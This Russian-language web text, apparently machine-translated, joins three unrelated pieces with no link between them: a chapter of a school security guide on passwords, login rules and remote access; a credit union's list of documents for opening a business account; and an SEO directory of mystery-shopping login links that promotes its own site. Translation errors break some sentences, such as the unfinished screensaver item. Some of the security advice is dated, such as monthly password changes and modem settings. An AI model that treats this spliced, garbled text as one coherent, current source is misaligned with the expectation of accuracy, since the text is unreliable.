 

Пароли

Поскольку пароли являются наиболее распространенным методом аутентификации пользователей, они заслуживают особого внимания.

Выбор пароля:

  • Требовать, чтобы пароль состоял не менее чем из шести символов (хотя от восьми до десяти предпочтительнее).
  • Запретить использование паролей, состоящих из слов, имен, дат или других обычно ожидаемых паролей. форматы.
  • Запретить использование паролей, которые отражают или идентифицируют владельца учетной записи (например, нет даты рождения, инициалы или имена домашних животных).
  • Требуется набор символов (например, буквы/цифры и верхний/нижний регистр, если система с учетом регистра).
Один из способов эффективного создания случайные пароли, которые можно легко запомнить, заключается в использовании первой буквы каждого слова в любимая цитата, сделайте каждую вторую букву заглавной и добавьте цифру. Например, Лонгфелло. «Один, если по суше, два, если по морю» (из «Поездки» Пола Ревера) становится паролем. «оИбЛтИбС3». 23

Сохранение пароля:

  • Требовать от системного администратора изменения всех предустановленных паролей, встроенных в программное обеспечение (например, супервизор, демо и root).
  • Систематически требовать смены паролей через заданные промежутки времени (например, один раз в месяц).
  • Поддерживайте абсолютную нетерпимость к обмену паролями.
  • Запретить незащищенное хранение личных паролей (напр.г., они не должны быть написаны на записку Post-It™, приклеенную скотчем к боковой стороне монитора).
  • Никогда не отправляйте пароль в составе сообщения электронной почты.
  • Предупредите пользователей, чтобы они не вводили свой пароль, когда кто-то может наблюдать.
  • Маскированный (или иным образом неясный) пароль отображается на мониторе, когда пользователи его вводят.
  • Напомните пользователям, что легко сменить пароль, если они думают, что их пароль был скомпрометирован.
  • Поддерживайте зашифрованную историю паролей, чтобы гарантировать, что пользователи не просто повторное использование старых паролей, когда они должны их изменить.
  • Контролировать рабочее место, чтобы убедиться, что все правила соблюдаются. последовал.

Менеджер по безопасности должен быть открыт для проблем пользователей системы.Безопасность – это улица с двусторонним движением, на которой и пользователи, и сотрудники службы безопасности имеют законные потребности.
 

Это действительно происходит!

Директор Маллинз был приверженцем правил, но он также серьезно относился к выполнению работы. Когда через две недели после начала занятий он узнал, что ни один из трех его новых учителей еще не получил учетные записи в компьютерной сети из центрального офиса, он пришел в ярость.У них было достаточно поводов для беспокойства, и им не мешало оставаться в автономном режиме. Он позвал своего помощника: «Меня не волнует, запрещает политика безопасности совместное использование паролей или нет, этим людям нужно войти в систему. Пусть они используют мой пароль для входа — это «A4a6dc», понятно? что у них есть доступ ко всему, что им нужно сделать свою работу!»

Прошло три недели, прежде чем системный администратор отправил письмо директору Маллинзу по электронной почте о явном неправильном использовании его пароля: «Системные журналы почти ежедневно показывают случаи, когда несколько человек одновременно пытаются войти в систему с вашим паролем.Пожалуйста, немедленно измените пароль и дайте мне знать, если у вас есть какие-либо идеи о том, кто его использует не по назначению.»

Директор Маллинз знал, что он не только рисковал неприятностями с системным администратором, но и поставил под угрозу безопасность системы. Несмотря на его первоначальный (и законный) гнев по поводу того, что его учителя не могут получить доступ к системе, ему не нравится обходить согласованную политику. К сожалению, когда центральный офис был настолько безразличен к потребностям его учителей и школы, он чувствовал, что у него осталось очень мало вариантов.Он ответил системному администратору: «Мои три новых учителя используя пароль, поскольку им еще не назначены собственные сетевые учетные записи. Мы не стремимся нарушать хорошие правила, а просто делаем свою работу — пожалуйста, позвольте нам это сделать. Найдите способ своевременно получить доступ нового персонала к системе, и мы обязательно будем уважать и соблюдать политику безопасности.» Директор Маллинз мог только надеяться, что системный администратор поймет его позицию и что безопасность системы не была нарушена.


Не забудьте настроить контрмеры в соответствии с потребностями организации и пользователей.


Некоторые злоумышленники используют «словари паролей», которые в буквальном смысле пытаются сопоставлять пароли по одному слову в течение тысяч и тысяч попыток!

  Установите стандартные процедуры учетной записи и аутентификации (известные как процедуры входа в систему):
  • Ограничьте пользователей до допустимого времени входа в систему : У среднего сотрудника дневной смены нет причин иметь доступ к системе посреди ночи.
  • Ограничение пользователей допустимыми местами входа в систему : У обычного сотрудника с терминалом на его или ее столе нет причин получать доступ к системе со стола своего руководителя.
  • Установите разумные ограничения на количество допустимых попыток входа в систему : Разрешите системе считать, что любой, кто не может правильно ввести пароль после трех попыток, на самом деле может быть не тем, кем он себя называет. Разрешайте пользователям более одной или двух попыток, иначе они могут совершить ошибки просто потому, что боятся, что их закроют.После трех неверных попыток учетная запись должна быть заблокирована (чтобы злоумышленник не смог просто перезвонить и повторить попытку еще три раза). Законные пользователи всегда могут повторно открыть свои учетные записи, связавшись с менеджером по безопасности.
  • Требовать от персонала выхода из системы и выключения компьютера : Последним важным шагом правильного входа в систему является правильный выход из системы. Пользователи должны выходить из системы каждый раз, когда они покидают свои рабочие места (например, на обед, перерывы и совещания).В конце концов, неавторизованный пользователь имеет полную свободу доступа авторизованного пользователя, когда компьютер оставлен без присмотра и зарегистрирован в системе.

 
Признайте, что повседневная физическая безопасность играет важную роль в управлении доступом пользователей (см. также главу 5):
  • Защита каждого узла доступа в системе : «Узел доступа» — это точка в сети, через которую вы можете получить доступ к системе.Если хотя бы одна такая точка останется незащищенной, то под угрозой окажется вся система. Хорошим примером часто забываемых узлов доступа являются модульные сетевые разъемы, которые часто встраиваются в конференц-залы (к которым можно подключать портативные компьютеры). Если неавторизованные пользователи могут получить доступ к такому узлу с ноутбуком , они могут атаковать систему.
  • Защита кабелей и проводов, как если бы они были узлами доступа : Если опытный злоумышленник может получить доступ к отрезку кабеля , который используется в качестве соединителя между элементами оборудования, он или она может получить доступ ко всей системе.Физический доступ к проводке называется «подключением к линии». Высококачественное оборудование может контролировать электрические излучения (известные как радиочастотные помехи) от проводов, даже не касаясь кабеля физически.
  • Отключить дисководы от серверов : Опытный злоумышленник может выполнить загрузку (технический термин для «запуска системы») с внешнего дисковода .
  • Установить экранных заставок (с обязательными функциями блокировки): проходя мимо монитора.


Дополнительную информацию о защите подключений к внешним сетям, включая Интернет, см. в главе 9.

  Обратите особое внимание на системы удаленного доступа (т. е. когда кто-то, в том числе авторизованный пользователь, получает доступ к вашей системе из удаленно через модем ):
  • Рассмотрите возможность требования предварительного утверждения для привилегий удаленного доступа : определенная подгруппа сотрудников для мониторинга более управляема чем каждый случайный человек, который звонит в систему.
  • Напомните персоналу, что удаленный доступ особенно подвержен мониторингу : Повышенный риск требует повышенной бдительности.
  • Настройка модемов на ответ только после нескольких звонков : Авторизованный пользователь будет знать, что он набрал «медленный» модем, и поэтому будет готов подождать. Случайный дозвонщик, желающий наткнуться на модемы, может быть менее терпеливым.
  • Используйте стратегию связи «обратный вызов» с пользователями удаленного доступа : После того, как пользователи позвонят и правильно идентифицируют себя, соединение сбрасывается, и затем система перезванивает авторизованным пользователям в предварительно утвержденном месте доступа.
  • Использовать программное обеспечение, требующее «аутентификацию сообщения» в дополнение к «аутентификации пользователя» : даже если пользователь может указать правильный пароль, доставка каждого отправленного и полученного сообщения должна быть проверена, чтобы убедиться, что неавторизованный пользователь не прервал передача.
  • Никогда не передавайте конфиденциальную информацию по телефонным линиям общего пользования, если передача не была предварительно зашифрована.
  • Изучите функции безопасности внешних сетей, к которым подключается система : Интернет и другие сети — это не просто объекты, к которым ваш персонал может получить доступ и просматривать, — это двусторонние линии связи. Если безопасность невозможно проверить, необходимо принять дополнительные меры предосторожности (например, шлюзы и брандмауэры ).
  • Установите брандмауэры в вашей системе на внешних точках доступа : Брандмауэр на сегодняшний день является наиболее распространенным способом защиты соединения между вашей сетью и внешними сетями.Он работает, позволяя только доверенным (аутентифицированным) сообщениям проходить в ваш внутренней сети извне (см. также главу 9).

  Школьные чиновники разрешают использовать калькуляторы в классе без обязательного понимания того, как работают транзисторы. математические расчеты. Точно так же они могут принимать обоснованные решения о высокотехнологичных вариантах безопасности, таких как брандмауэры, без необходимости становиться экспертами по установке и эксплуатации соответствующего программного и аппаратного обеспечения.
   
  • Никогда не размещайте в открытом доступе телефонные номера для связи : Зачем рекламировать то, что авторизованные пользователи уже должны знать?
  • Отключать модемы, когда они не используются. : Нет необходимости обеспечивать действующую линию доступа к системе и из системы, если в этом нет необходимости.
  • Никогда не оставляйте модем в режиме автоматического ответа : Такая практика открывает двери для несанкционированного и неконтролируемого доступа к системе.
  • Разрешить использование модема только из безопасных мест : Никогда не позволяйте модему подключаться к системному компьютеру, который не является самим собой защищен брандмауэром или шлюзом.
  • Предоставление доступа к Интернету только тем сотрудникам, которым он нужен для выполнения своей работы : Студенту может понадобиться Интернет для законных учебных целей, а помощнику по персоналу, вероятно, нет.
  • Напомните учащимся и персоналу, что Интернет (и вся системная деятельность в этом отношении) предназначен только для разрешенного использования. : Существует бесчисленное множество Интернет-сайтов и видов деятельности, которые не оказывают положительного влияния на образовательную среду.Им не место в системе.
  • Требовать от всех пользователей подписать Соглашений о надлежащем использовании перед получением доступа к системе : Подписанные соглашения о безопасности (см. главу 3) подтверждают, что пользователи проинформированы о своих обязанностях и понимают, что они будут нести ответственность за свои действия.
     
   
     
   

Контрольный список безопасности доступа пользователей

Хотя это может быть заманчиво обращаться к следующему контрольному списку как к вашему плану безопасности, это ограничить эффективность рекомендаций.Они самые полезные когда инициируется как часть более крупного плана по разработке и внедрению безопасности политика во всей организации. Другие главы в этом документе также рассмотреть способы настройки политики в соответствии с конкретными потребностями вашей организации. концепция, которую нельзя игнорировать, если вы хотите максимизировать эффективность любого заданного руководства.

   
Контрольный список безопасности для главы 8
Краткость контрольного списка может быть полезной, но она никоим образом не компенсирует детализации текста.
   
   


Открытие коммерческого счета

Открыть счет для вашего бизнеса, организации или ассоциации очень просто.

Посетите любое отделение

Вы можете открыть бизнес-счет, посетив любой филиал.

Необходимая документация

ИНФОРМАЦИЯ О ЛИЦАХ: Чтобы помочь правительству бороться с финансовыми преступлениями, федеральные правила требуют, чтобы финансовые учреждения получали, проверяли и регистрировали информацию о бенефициарных владельцах юридических лиц. Юридические лица могут быть использованы для сокрытия причастности к финансированию терроризма, отмыванию денег, уклонению от уплаты налогов, коррупции, мошенничеству и другим финансовым преступлениям. Требование раскрытия ключевых лиц, которые в конечном счете владеют юридическим лицом или контролируют его (т.е., бенефициарные владельцы) помогает правоохранительным органам расследовать и преследовать эти преступления.

Какую информацию я должен предоставить? Вы должны предоставить полное официальное имя, физический адрес, дату рождения и номер социального страхования для лиц, перечисленных ниже. Кредитный союз также попросит предъявить и может сохранить четкую копию водительских прав или другого удостоверения личности с фотографией (удостоверения личности) с неистекшим сроком действия для каждого лица, указанного ниже.

  • Бенефициарный владелец: Каждое физическое лицо, если таковое имеется, которое прямо или косвенно владеет 20 или более процентами акций юридического лица (например,г., каждое физическое лицо, владеющее 20% или более акций корпорации). Косвенное владение включает в себя владение физическим лицом через другое юридическое лицо.
  • Контролирующее лицо: Лицо, несущее значительную ответственность за управление юридическим лицом (например, главный исполнительный директор, главный финансовый директор, главный операционный директор, управляющий член, генеральный партнер, президент, вице-президент или казначей) или любое другое физическое лицо. который регулярно выполняет аналогичные функции.Для каждой учетной записи должно быть назначено по крайней мере одно управляющее лицо.
  • Уполномоченное лицо, имеющее право подписи: Лицо, имеющее полномочия вести любые дела или получать денежные выплаты по всем акциям, чекам, сертификатным счетам и кредитным линиям, связанным со счетом.

ВИДЫ ПРЕДПРИЯТИЙ И НЕОБХОДИМАЯ ИНФОРМАЦИЯ: Определенные документы требуются в зависимости от юридической структуры бизнес. Дополнительные документы могут потребоваться, если в предоставленных документах имеется неясная или отсутствующая информация.Кредитный союз признает, что в разных штатах, округах и/или местных муниципалитетах могут быть разные названия конкретной деловой документации. Эти документы будут приемлемыми, если будет установлено, что они в разумных пределах сопоставимы с требованиями к документации на Аляске, США.

* Если компания работает под торговой маркой или альтернативным названием Doing Business As (DBA) основной организации, может потребоваться дополнительная документация.

    Корпорация

    1. Бизнес-лицензия (может быть отменена для некоммерческих корпораций)
    2. Идентификационный номер работодателя (EIN), буква CP575 (или заменяющая буква EIN LTR147C)
    3. Текущий первоначальный отчет/Годовой отчет/Отчет за двухгодичный период, ИЛИ
      Учредительный договор, ИЛИ
      Свидетельство о регистрации И
      Корпоративная резолюция

    Общество с ограниченной ответственностью (ООО)

    1. Бизнес-лицензия
    2. Идентификационный номер работодателя (EIN) Буква CP575 (или заменяющая EIN буква LTR147C), ИЛИ
      Если это Индивидуальное предприятие с ограниченной ответственностью, в котором нет сотрудников, номер социального страхования Индивидуального предпринимателя
    3. Текущий первоначальный отчет/Годовой отчет/Отчет за двухгодичный период, ИЛИ
      Поданный Устав, ИЛИ
      Сертификат организации И
      Операционное соглашение

    Организация или ассоциация

    1. Бизнес-лицензия (может быть отменена для некоммерческих организаций или ассоциаций)
    2. Идентификационный номер работодателя (EIN), буква CP575 (или заменяющая буква EIN LTR147C)
    3. Резолюция, ИЛИ
      Поданный устав организации, ИЛИ
      Протокол собрания

    Товарищество

    1. Бизнес-лицензия
    2. Идентификационный номер работодателя (EIN), буква CP575 (или заменяющая буква EIN LTR147C)
    3. Если это товарищество с ограниченной ответственностью или товарищество с ограниченной ответственностью,
      Поданный договор о партнерстве, ИЛИ
      Сертификат товарищества с ограниченной или ограниченной ответственностью И
      Операционное соглашение

    Индивидуальное предприятие

    1. Бизнес-лицензия
    2. Идентификационный номер работодателя (EIN) Буква CP575 (или заменяющая EIN буква LTR147C), ИЛИ
      Если у Индивидуального предпринимателя нет сотрудников, номер социального страхования Индивидуального предпринимателя

Www Mysteryshops Com Login Asp — Тайные покупатели

Поиск www myshops com login asp ? Вот лучший способ добраться до страницы asp входа в систему www myshopscom.com.Ознакомьтесь со списком ссылок, которые мы подобрали для вас, чтобы вы могли легко получить доступ к своей учетной записи asp для входа в систему www myshops.com.

Тайные покупатели

https://www.mystery-shoppers.com/ В условиях конкурентного рынка, где предприятия конкурируют за клиентов, удовлетворенность клиентов рассматривается как ключевой фактор отличия и стала ключевым элементом бизнес-стратегии. Плохое обслуживание клиентов влияет на вашу прибыль. • Привлечение новых клиентов стоит примерно в 6 раз больше денег, чем удержание существующего клиента.Посетить страницу

Облегченная форма входа

https://msm-mysteryshopping.com/document.asp?alias=логин E-mail или Имя пользователя: Пароль: Логин Посетить страницу

Станьте тайным покупателем Ipsos | Зарабатывай деньги в свободное время

https://ishopforipsos.com/en_US/sign/логин Станьте тайным покупателем Ipsos | Зарабатывайте в свободное время. Мы предлагаем возможности тайных покупок на обеих наших торговых платформах. Обязательно проверьте Shopmetrics и Sassie на наличие возможностей в вашем регионе. Если вы не уверены, на какой платформе хранятся ваши текущие задания, обратитесь за помощью по адресу [email protected].Шопметрика. Сэсси. Посетить страницу

Решения для тайных покупателей — mystshopsol.com

https://www.mystshopsol.com/ Мы хотели бы показать вам описание здесь, но сайт не позволяет нам. Посетить страницу

Вход для покупателя

http://www.remysteryshops.com/shopper-login.php Ремингтон оценки | Услуги тайных покупателей Стать покупателем дома. Вход для клиентов | Вход для покупателей Посетить страницу

РАСПИСАНИЕ ПОКУПАТЕЛЯ

https://www.mymysteryshop.com/shoppers/ShopperScheduling.php РАСПИСАНИЕ ПОКУПАТЕЛЯ. Вы не вошли в систему. НАЖМИТЕ ЗДЕСЬ, ЧТОБЫ ВОЙТИ. Посетить страницу

Покупатели — Тайные покупатели

http://www.mystery-shoppers.com/shoppers Тайные покупатели — это люди, которые занимаются бизнесом или звонят в бизнес, чтобы оценить услуги этого бизнеса. Как стать тайным покупателем? Все, что вам нужно сделать, это нажать на эту ссылку и зарегистрироваться. Как только вы зарегистрируетесь, когда у нас появятся магазины в вашем районе, вы начнете получать электронные письма с… Посетить страницу

Форум тайных покупателей

https://www.myshopforum.com/login.php?0 Авторизоваться; Присоединиться; Поиск; Не зарегистрирован? Нажмите здесь для регистрации. Введите имя пользователя и пароль для входа в систему. Имя пользователя: Пароль: Вы забыли свой пароль? Введите свой адрес электронной почты ниже, и новый пароль будет отправлен вам. … Посетить страницу

Услуги тайных покупателей — NSSN

https://www.mysteryshopper.net/ Национальная сеть обслуживания покупок (NSSN) предоставляет услуги тайных покупок и решения для исследования рынка с 1986 года. Начав как региональная компания, предлагающая услуги тайных покупок в Денвере, штат Колорадо, мы вскоре выросли до национального уровня и получили возможность обслуживать широкий спектр отраслей промышленности в Соединенных Штатах и ​​​​Канаде.Посетить страницу

Стать покупателем — Услуга тайного покупателя

Shoppers
После регистрации вы можете стать тайным покупателем. Вы выбираете задания, которые соответствуют вашему расписанию, и вы не обязаны принимать задания, но как только задание принято, магазин должен быть завершен. Если вы считаете, что соответствуете критериям, прочитайте дополнительную информацию и завершите регистрацию. Посетить страницу

www.mysteryshops.com.нам

https://www.mysteryshops.us/ www.mysteryshops.us Посетить страницу

Логин оценщика

https://baidata.com/shoppers/LoginShopper.norm.php Логин оценщика. ВАЖНО: Оценщики в США, КАНАДЕ, АРУБЕ, БАГАМСКИХ ОСТРОВАХ, КАЙМАНОВЫХ ОСТРОВАХ, ЯМАЙКЕ, ПУЭРТО-РИКО, ВИРГИНСКИХ ОСТРОВАХ (БРИТАНСКИЕ), ВИРГИНСКИХ ОСТРОВАХ (США), МАЛЫХ ОТДАЛЕННЫХ ОСТРОВАХ СОЕДИНЕННЫХ ШТАТОВ И ВЕНЕСУЭЛЕ (БОЛИВАРИАНСКАЯ РЕСПУБЛИКА). Плата за оказанные услуги и возмещение ранее одобренных/включенных расходов будут обрабатываться нашим … Посетить страницу

Логин

https://portal.mysteryshopper.net/login.asp Авторизоваться Посетить страницу

Менеджер по обслуживанию — Седжвик

https://smweb.expert.stericycle.com/servicemanager/login.aspx Требуется Internet Explorer 8 или выше: Забыли пароль? Позвоните по телефону 1-800-977-8943 Copyright© 2021 Sedgwick Политика конфиденциальности Условия использования Политика конфиденциальности Посетить страницу

Станьте тайным покупателем Ipsos | Зарабатывай деньги в свободное время

https://ishopforipsos.com/en_GB/sign/логин Хотите стать Тайным покупателем Ipsos? Зарегистрируйтесь на iShopFor Ipsos и зарабатывайте дополнительные деньги, выполняя задания Mystery Shopping по всей Великобритании.Получайте деньги за покупки в различных компаниях. Посетить страницу

Стать тайным покупателем | Тайный покупатель

https://www.secretshopper.com/ShopperSignup/ShopperSignupStart Я стал покупателем, чтобы иметь гибкий график работы (что для меня бесценно). Эта работа также очень подходит моему характеру. Это идеально подходит. Мне нравится работать с Secret Shopper, потому что люди, с которыми я работаю, превосходны. У меня отличные планировщики с разными проектами, и с редакторами приятно работать. Посетить страницу

Тайный покупатель.com.au — члены

http://mysteryshopper.com.au/shoppers_login.asp Текущие тайные покупатели входят в систему через форму ниже. Введите свой зарегистрированный адрес электронной почты в поле ниже, и мы сразу же вышлем вам пароль. Чтобы стать Тайным покупателем, воспользуйтесь формой. Посетить страницу

Консультант по работе с клиентами | Койл Гостеприимство

Home Working
Минди Баша Вице-президент по гостеприимству, MedMen. Койл дает нам ценную информацию об опыте фанатов. Благодаря их тщательным стандартам обеспечения качества и процессу проверки мы получили ценную информацию о предоставляемых нами услугах, которые в противном случае были бы недоступны.Джесси Ратнер Кливлендские индейцы. Посетить страницу

КСС Международный

http://kernscheduling.com/ KSS International — это ведущая команда по планированию и подбору персонала. Если вы являетесь компанией, стремящейся к совершенству в своих отчетах, или независимым подрядчиком, стремящимся присоединиться к поставщикам самого высокого качества в мире, ваше путешествие начинается здесь. Позвольте KSS International помочь вам в достижении вашей цели. Посетить страницу

Защита торговой марки — Sedgwick

https://www.sedgwick.com/brandprotection Компания Sedgwick, которой доверяют ведущие мировые бренды и на которую больше всего полагаются предприятия, является ведущим на рынке поставщиком лучших решений для отзыва, исправления и хранения данных. Запросы в США: 888.732.3901. Международные запросы: +44 (0)333 300 0901. Свяжитесь с нами Логин. Посетить страницу

Менеджер по обслуживанию

https://smweb.expert.stericycle.com/servicemanagerlogin/ Введите имя пользователя и нажмите «отправить пароль». Вы получите электронное письмо с вашим паролем. Если вы забыли свое имя пользователя, свяжитесь со Stericycle @ 800… Посетить страницу

29 лучших компаний тайных покупателей, предлагающих услуги тайного покупателя …

29 Best Mystery Shopping Companies Offering Secret Shopper Jobs
2. ГОЛЫЙ. BARE нанимает тайных покупателей для личных или телефонных разговоров с клиентами или видео-посещений. В 2019 году компания получила награду Shopper’s Choice от MSPA. За эту награду голосуют люди, выполняющие задания по тайным покупкам, и это означает, что BARE была одной из их любимых компаний для работы. Посетить страницу

Тайный покупатель — Первоклассная компания тайных покупателей

https://www.secretshopper.com/ Передовая компания по работе с клиентами: Secret Shopper. Secret Shopper уже более 25 лет проводит для наших клиентов действенные исследования и анализ рынка. За это время мы успешно помогли клиентам почти во всех отраслях, ориентированных на клиента, чтобы обеспечить передовой опыт работы с клиентами. Измерение клиентского опыта. Посетить страницу

Остерегайтесь мошенничества с тайным покупателем — USA TODAY

https://www.usatoday.com/story/money/columnist/2017/03/11/beware-mystery-shopper-scam/988/ Афера с тайным покупателем — это афера, которая существует уже много лет и до сих пор используется для кражи денег у ничего не подозревающих жертв.Мошенничество… Посетить страницу

Стать покупателем | Рыночная сила

https://www.marketforce.com/become-a-shopper Или есть. Или играть. Станьте тайным покупателем Market Force и получайте вознаграждение за то, что вам нравится! Это бесплатно, это платно, и это важно. Тайные покупатели оказывают влияние на местные сообщества, помогая магазинам, ресторанам и банкам стать… Посетить страницу

Лучший тайный покупатель Работа

https://www.thepennyhoarder.com/make-money/best-mystery-shopping-companies-to-work/ Хотите стать тайным покупателем? Если да, то мы нашли четыре лучшие компании тайных покупателей, в которых можно работать.Тайные покупатели бывают под разными именами — оценщики, тайные покупатели, — но, независимо от названия, работа одна и та же: тайные покупатели документируют свой опыт, чтобы помочь предприятиям, которые много взаимодействуют с общественностью. Посетить страницу

Онлайн-вход MSL

https://online.mystery-shoppers.co.uk/login.asp Еще не зарегистрированы? Станьте покупателем. Мобильные тайные покупатели Посетить страницу

Услуга «Тайный покупатель» — исследование конкурентов для предприятий

https://www.mysteryshoppingservice.com.ком/ Гостеприимство. «Мы сотрудничаем с Mystery Shopping Service последние 2 года. Что я больше всего ценю в наших отношениях, так это то, что они знают мой бизнес и помогли нам понять услуги, которые мы предлагаем, с точки зрения нашего клиента. Это было бесценно, так как позволило нам узнать, что можно улучшить для клиента… Посетить страницу

Руководство для начинающих по тайным покупкам: пивомани

A beginners guide to Mystery Shopping from beermoney
Будьте организованы! Вам нужно будет зарегистрироваться как минимум в 50 компаниях, чтобы получить хороший выбор магазинов на выбор, и больше, если вы живете дальше от большого города.Создайте электронную таблицу Excel, чтобы отслеживать данные для входа, избранные типы магазинов для каждой компании, график оплаты и еще одну таблицу, чтобы отслеживать принятые вами задания и сроки их выполнения. Посетить страницу

Ресурсы для покупателей

http://remysteryshops.com/shopper-resources.php Сохраните в формате PDF и отправьте на [email protected] для обработки. Все счета должны включать: Имя покупателя. Имя того, кому должен быть выписан чек. Номер счета для отслеживания. Адрес, на который вы хотите отправить чек.Идентификационный номер(а) работы, сделанной сообществом. Цель сделала покупки. Посетить страницу

Обзор тайных покупателей: Международное корпоративное исследование …

Mystery Shopping Review: Corporate Research International
ОБНОВЛЕНИЕ: Corporate Research International объединилась с другой компанией и теперь называется Stericycle ExpertSolutions. Вы можете зарегистрироваться с ними здесь. ОБНОВЛЕНИЕ: по состоянию на январь 2020 года сайт загадочных покупок Stericycle не работает. Corporate Research International (CRI) — законная компания тайных покупателей, в которой я лично работал и […] Посетить страницу

Шаблон анкеты для тайного покупателя | QuickTapSurvey

https://www.quicktapsurvey.com/research/templates/mystery-shopper-form-survey Обзор шаблона формы тайного покупателя. Сбор отзывов с помощью тайных покупателей дает вам представление о вашем клиентском опыте глазами ваших клиентов. Тайный покупатель может предоставить вам ценную обратную связь, чтобы вы могли: Улучшить качество обслуживания клиентов, выявив действенные вещи, которые вы можете улучшить. Посетить страницу

stericycle.es главная | stericycle.es

http://stericycle.es.url4es.ком/ Направления IP-адреса таманьо 32-битного IPv4, который является основным и индикационным с 4-битным 8-битным номером, различаются между собой. Телефон для связи: 217.116.16.122. IP-адрес servidor de stericycle.es es 217.116.16.122, Hemos descubierto 10+ site facilitado en este servidor. Посетить страницу

Корпоративные исследования

https://www.mysteryshopforum.com/read/6/416367 В этой компании становится все хуже работать. На заправочных станциях [торговая марка удалена] снижена сумма, которую они платят за бензин и покупки в магазине.Не стоит тратить время или деньги, чтобы работать на них. Примечание к модулю: Пожалуйста, не связывайте клиента с компанией, которая… Посетить страницу

Список компаний, работающих на дому в США

https://www.hiox.org/30634-list-of-the-work-at-home-companies-in.php Список компаний, работающих на дому в США — другие записки на Hiox.org, ресурс для обмена технической и нетехнической информацией. Посетить страницу

5 лучших вакансий тайного покупателя, которые хорошо оплачиваются (30 долларов в час …

https://thesavvycouple.com/тайный покупатель-работы/ Тайный покупатель. Это законная компания тайных покупателей — они работают с 1990 года и являются учредителем Ассоциации поставщиков услуг тайных покупателей, профессиональной торговой ассоциации индустрии тайных покупок. Оплата за каждую работу будет разной, но нормальный диапазон выплат составляет 15-25 долларов. Посетить страницу

Кто-нибудь посещает тайные лавки? : пивомани

Does anyone do Mystery Shops? from beermoney
У людей сложилось представление, что тайный шоппинг — это какое-то приятное, легкое и простое дерьмо, которое хорошо оплачивается и не требует усилий.Тайный покупатель — это раздражающе большой объем работы и обручей, через которые нужно пройти — вы выполняете около 20+ минут работы перед покупкой, едете и делаете покупки в течение часа или больше, а затем вы должны идти домой и быстро писать. резюме, учитывающее несколько мелких деталей вашего… Посетить страницу

Печенье, Ограбление и Крылья: Тайна жизни …

Cookies, A Robbery, and Wings: The Life Of A Mystery Shopper
Концепция тайных покупок существует уже давно.Тайные покупатели приходят в магазины, изображая из себя реальных клиентов, а затем пишут оценку своего опыта в обмен на небольшую плату. Я начал заниматься тайными покупками несколько лет назад, прежде всего, как способ заработать немного дополнительных денег. Но со временем он стал намного больше. А вы знали, что тайный покупатель может быть… Посетить страницу

8 правд от тайного покупателя, которые вы должны прочитать, прежде чем…

https://www.wisebread.com/8-truths-from-a-mystery-shopper-you-must-read-before-you-get-started 8 советов для тайных покупок.Вау, магазины при отелях, звучит мило. Я принадлежу к одной службе, и время от времени они перечисляют магазин для определенного магазина игрушек, который удобно расположен для меня. Посетить страницу

18 лучших компаний тайных покупателей, чтобы заработать дополнительные деньги …

https://wellkeptwallet.com/best-mystery-shopping-companies/ Ознакомьтесь со списком ниже, чтобы найти компанию тайного покупателя, которая лучше всего соответствует вашим потребностям! 1. БестМарк. BestMark — крупнейшая компания тайных покупок, имеющая потрясающую репутацию. С оценкой BBB (Better Business Bureau) A +, скорее всего, у вас будет… Посетить страницу

Стань тайным покупателем! — ты заслуживаешь это.ком

http://www.youdeserveit.com/MysteryShopper.htm Я уже некоторое время занимаюсь тайными покупками и зарабатываю дополнительные деньги. Есть много компаний, которые предлагают возможность стать тайным покупателем. Посетить страницу

15 лучших компаний тайных покупок в 2020 году — центы + заказ

https://www.centsandorder.com/best-mystery-shopping-companies/ Как только ваша заявка будет одобрена, GBW отправит информацию для входа на вашу электронную почту. Они свяжутся с вами по электронной почте, если в вашем районе есть доступный магазин.Когда вы делаете какие-либо тайные покупки для GBW, вам будут платить один раз в месяц электронным переводом средств. 6. В поисках лучшего. Quest for Best — компания тайных покупателей, работающая в 40 штатах США. … Посетить страницу

Гелион Исследования — Дом

https://www.helionresearch.com/en Helion Research действительно глобальна. Имея более 400 000 полевых сотрудников в более чем 100 странах мира, мы специализируемся на решениях для исследований в нескольких странах. Наш проверенный… Посетить страницу

Идеи для домашней работы | Страница 2 | Достаточное самостоятельное создание файла …

https://www.sufficientself.com/threads/home-work-ideas.6522/page-2 Присоединился 27 сент. 2010 г. Сообщений 13 394 Оценка реакции 702 Очки 407 Посетить страницу

Стать независимым оценщиком | Услуги по оценке бизнеса

Become an Independent Evaluator
Mystery Shopper Services — это подразделение Business Evaluation Services, расположенное в Калифорнии. BES является национальной компанией и работает с 1996 года, обслуживая все точки … Посетить страницу

Работа на дому Отзывы и возможности: 08.07

https://bytemi.blogspot.com/2007/08/ Рабочие решения Обеспечивает работу колл-центра (по телефону) и работу по вводу данных для агентов, работающих дома. Сборы не взимаются. Агенты могут работать над 2-3 проектами одновременно в зависимости от своих навыков и могут зарабатывать от 7,20 до 30 долларов в час в зависимости от проекта. Требуется высокоскоростной доступ в Интернет и ПК с Windows. Посетить страницу

Просто что угодно ICO!: Работа на дому — Blogger

https://piaot.blogspot.com/2008/02/работа на дому.HTML Это ооочень здорово. Я нашел список компаний, работающих на дому в США, когда я только исследовал www.ccicompany.us, были ли они законными или нет, потому что я не хочу, чтобы они взломали наш компьютер или что-то в этом роде, я имею в виду, что это не так. что здесь много конфиденциальной информации, но все же я не хочу, чтобы это произошло, wala naman mga Financial info na makukuha dito e. Посетить страницу

Обращение/Просьба о помощи [Архив] — Форум WAHM — WAHM.com

https://www.wahm.com/forum/archive/t-248511.HTML Форумы WAHM. Форум сообщества WAHM был создан, чтобы мамы, работающие дома, могли делиться своими идеями и историями. На форуме вы можете найти информацию о работе на дому, открытии домашнего бизнеса, избегании мошенничества и выживании в стиле WAHM. В поддержку сообщества WAHM на WAHM.com также размещены обучающие статьи, простые … Посетить страницу

Зачем использовать loginresults.com?

Ответ очень прост — это экономит ваше личное время, а также защищает вас от вредоносных сайтов, которые могут украсть ваши данные.

Мы всегда тщательно проверяем источники информации, поэтому вы можете быть уверены, что для страницы входа asp www myshops.com мы выбрали только официальные и проверенные страницы.

Каждый день мы добавляем новые компании в нашу базу данных. Сейчас в нашей базе данных более 500 000 сайтов/сервисов/компаний и их страниц входа.

Как мне найти другие страницы входа в вашем каталоге?

Точно так же, как вы искали asp-страницу входа в систему www myshopscom.com.

  • Вы можете воспользоваться поиском на нашем сайте.
  • Вы можете выбрать соответствующую категорию на нашем сайте и найти там нужную страницу входа. Также для вашего удобства мы расположили названия компаний/сайтов в алфавитном и числовом порядке, чтобы максимально упростить поиск страниц входа.
  • Кроме того, только для пользователей loginresults.com: вы можете написать нам по электронной почте, и мы вышлем вам список официальных страниц входа на сайт, который вы ищете.

